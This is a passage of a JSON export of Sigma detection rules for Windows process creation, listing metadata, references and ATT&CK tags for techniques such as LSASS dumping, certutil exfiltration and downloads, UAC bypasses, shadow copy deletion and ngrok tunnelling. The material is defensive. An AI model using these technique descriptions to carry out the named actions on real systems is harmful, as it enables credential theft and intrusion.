http 3978 (https://learn.microsoft.com/en-us/azure/bot-service/bot-service-debug-channel-ngrok?view=azure-bot-service-4.0)" ], "filename": "proc_creation_win_pua_ngrok.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://cybleinc.com/2021/02/15/ngrok-platform-abused-by-hackers-to-deliver-a-new-wave-of-phishing-attacks/", "https://www.softwaretestinghelp.com/how-to-use-ngrok/", "https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html", "https://twitter.com/xorJosh/status/1598646907802451969", "https://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp", "https://www.virustotal.com/gui/file/58d21840d915aaf4040ceb89522396124c82f325282f805d1085527e1e2ccfa1/detection", "https://ngrok.com/docs", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_ngrok.yml" ], "tags": [ "attack.command-and-control", "attack.t1572" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee37eb7c-a4e7-4cd5-8fa4-efa27f1c3f31", "value": "PUA - Ngrok Execution" }, { "description": "Detects suspicious renamed SysInternals DebugView execution", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-05-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_sysinternals_debugview.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.epicturla.com/blog/sysinturla", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_sysinternals_debugview.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd764533-2e07-40d6-a718-cfeec7f2da7f", "value": "Renamed SysInternals DebugView Execution" }, { "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "Legitimate script" ], "filename": "proc_creation_win_msiexec_execute_dll.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6f4191bb-912b-48a8-9ce7-682769541e6d", "value": "Suspicious Msiexec Execute Arbitrary DLL" }, { "description": "Detects WMI script event consumers", "meta": { "author": "Thomas Patzke", "creation_date": "2018-03-07", "falsepositive": [ "Legitimate event consumers", "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" ], "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1546.003" ] }, "related": [ { "dest-uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", "value": "WMI Persistence - Script Event Consumer" }, { "description": "Detects changes to the \"DisableRestrictedAdmin\" registry value in order to disable or enable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", "meta": { "author": "frack113", "creation_date": "2023-01-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", "https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md", "https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_lsa_disable_restricted_admin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "28ac00d6-22d9-4a3c-927f-bbd770104573", "value": "RestrictedAdminMode Registry Value Tampering - ProcCreation" }, { "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", "meta": { "author": "Teymur Kheirkhabarov", "creation_date": "2019-10-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://pentestlab.blog/2017/03/30/weak-service-permissions/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d937b75f-a665-4480-88a5-2f20e9f9b22a", "value": "Possible Privilege Escalation via Weak Service Permissions" }, { "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1628720819537936386", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_allow_service_changes.yml" ], "tags": [ "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "value": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE" }, { "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", "meta": { "author": "Alexander McDonald", "creation_date": "2022-06-24", "falsepositive": [ "Legitimate use of Msra.exe" ], "filename": "proc_creation_win_msra_process_injection.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", "https://www.fortinet.com/content/dam/fortinet/assets/analyst-reports/ar-qakbot.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msra_process_injection.yml" ], "tags": [ "attack.defense-evasion", "attack.t1055" ] }, "related": [ { "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "744a188b-0415-4792-896f-11ddb0588dbc", "value": "Potential Process Injection Via Msra.EXE" }, { "description": "Detects the malicious use of a control panel item", "meta": { "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", "creation_date": "2020-06-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_control_panel_item.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_control_panel_item.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218.002", "attack.persistence", "attack.t1546" ] }, "related": [ { "dest-uuid": "4ff5d6a8-c062-4c68-a778-36fc5edd564f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b6301b64-ef57-4cce-bb0b-77026f14a8db", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", "value": "Control Panel Items" }, { "description": "Detects a suspicious script execution in temporary folders or folders accessible by environment variables", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military", "https://learn.microsoft.com/en-us/windows/win32/shell/csidl", "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1228c958-e64e-4e71-92ad-7d429f4138ba", "value": "Script Interpreter Execution From Suspicious Folder" }, { "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_conhost_uncommon_parent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_conhost_uncommon_parent.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", "value": "Conhost Spawned By Uncommon Parent Process" }, { "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-19", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/LOLBAS-Project/LOLBAS/pull/147", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", "value": "DeviceCredentialDeployment Execution" }, { "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_susp_process_creation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", "value": "Suspicious Process Created Via Wmic.EXE" }, { "description": "Detects Windows Installer service (msiexec.exe) spawning \"cmd\" or \"powershell\"", "meta": { "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_elavated_msi_spawned_shell.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_elavated_msi_spawned_shell.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1e53dd56-8d83-4eb4-a43e-b790a05510aa", "value": "Always Install Elevated MSI Spawned Cmd And Powershell" }, { "description": "Detects some Empire PowerShell UAC bypass methods", "meta": { "author": "Ecco", "creation_date": "2019-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_empire_powershell_uac_bypass.yml", "level": "critical", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64", "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3268b746-88d8-4cd3-bffc-30077d02c787", "value": "HackTool - Empire PowerShell UAC Bypass" }, { "description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-12-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_createminidump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", "value": "HackTool - CreateMiniDump Execution" }, { "description": "Detects the execution of certutil with the \"encode\" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-02-24", "falsepositive": [ "As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly" ], "filename": "proc_creation_win_certutil_encode.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a", "value": "File Encoded To Base64 Via Certutil.EXE" }, { "description": "Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_certutil_download_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/egre55/status/1087685529016193025", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download_file_sharing_domains.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42a5f1e7-9603-4f6d-97ae-3f37d130d794", "value": "Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE" }, { "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", "meta": { "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "creation_date": "2019-07-31", "falsepositive": [ "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/hFireF0X/status/897640081053364225", "https://github.com/hfiref0x/UACME", "https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf", "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002", "attack.t1218.003", "attack.g0069", "car.2019-04-001" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", "value": "CMSTP UAC Bypass via COM Object Access" }, { "description": "Detects execution of the built-in script located in \"C:\\Windows\\System32\\gatherNetworkInfo.vbs\". Which can be used to gather information about the target machine", "meta": { "author": "blueteamer8699", "creation_date": "2022-01-03", "falsepositive": [ "Administrative activity" ], "filename": "proc_creation_win_lolbin_gather_network_info.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", "https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gather_network_info.yml" ], "tags": [ "attack.discovery", "attack.execution", "attack.t1615", "attack.t1059.005" ] }, "related": [ { "dest-uuid": "1b20efbf-8063-4fc3-a07d-b575318a301b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", "value": "Potential Reconnaissance Activity Via GatherNetworkInfo.VBS" }, { "description": "Detects possible payload obfuscation via the commandline", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-02-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_cmd_dosfuscation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/dosfuscation-report.pdf", "https://github.com/danielbohannon/Invoke-DOSfuscation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dosfuscation.yml" ], "tags": [ "attack.execution", "attack.t1059" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a77c1610-fc73-4019-8e29-0f51efc04a51", "value": "Potential Dosfuscation Activity" }, { "description": "Shadow Copies deletion using operating systems utilities", "meta": { "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "creation_date": "2019-10-22", "falsepositive": [ "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "filename": "proc_creation_win_susp_shadow_copies_deletion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/", "https://github.com/Neo23x0/Raccine#the-process", "https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100", "https://redcanary.com/blog/intelligence-insights-october-2021/", "https://blog.talosintelligence.com/2017/05/wannacry.html", "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.impact", "attack.t1070", "attack.t1490" ] }, "related": [ { "dest-uuid": "799ace7f-e227-4411-baa0-8868704f2a69", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c947b146-0abc-4c87-9c64-b17e9d7274a2", "value": "Shadow Copies Deletion Using Operating Systems Utilities" }, { "description": "Detects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-04-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_invoke_webrequest_direct_ip.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1edff897-9146-48d2-9066-52e8d8f80a2f", "value": "Suspicious Invoke-WebRequest Execution With DirectIP" }, { "description": "Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_vscode_tunnel_renamed_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://code.visualstudio.com/docs/remote/tunnels", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_renamed_execution.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2cf29f11-e356-4f61-98c0-1bdb9393d6da", "value": "Renamed Visual Studio Code Tunnel Execution" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_stdin.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher" }, { "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n", "meta": { "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "creation_date": "2023-03-05", "falsepositive": [ "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" ], "filename": "proc_creation_win_certutil_certificate_installation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml" ], "tags": [ "attack.defense-evasion", "attack.t1553.004" ] }, "related": [ { "dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", "value": "New Root Certificate Installed Via Certutil.EXE" }, { "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", "meta": { "author": "frack113", "creation_date": "2021-12-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sysinternals_tools_masquerading.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_tools_masquerading.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1218", "attack.t1202" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", "value": "Potential Binary Impersonating Sysinternals Tools" }, { "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_radmin.yml", "level": "medium", "logsource.category": 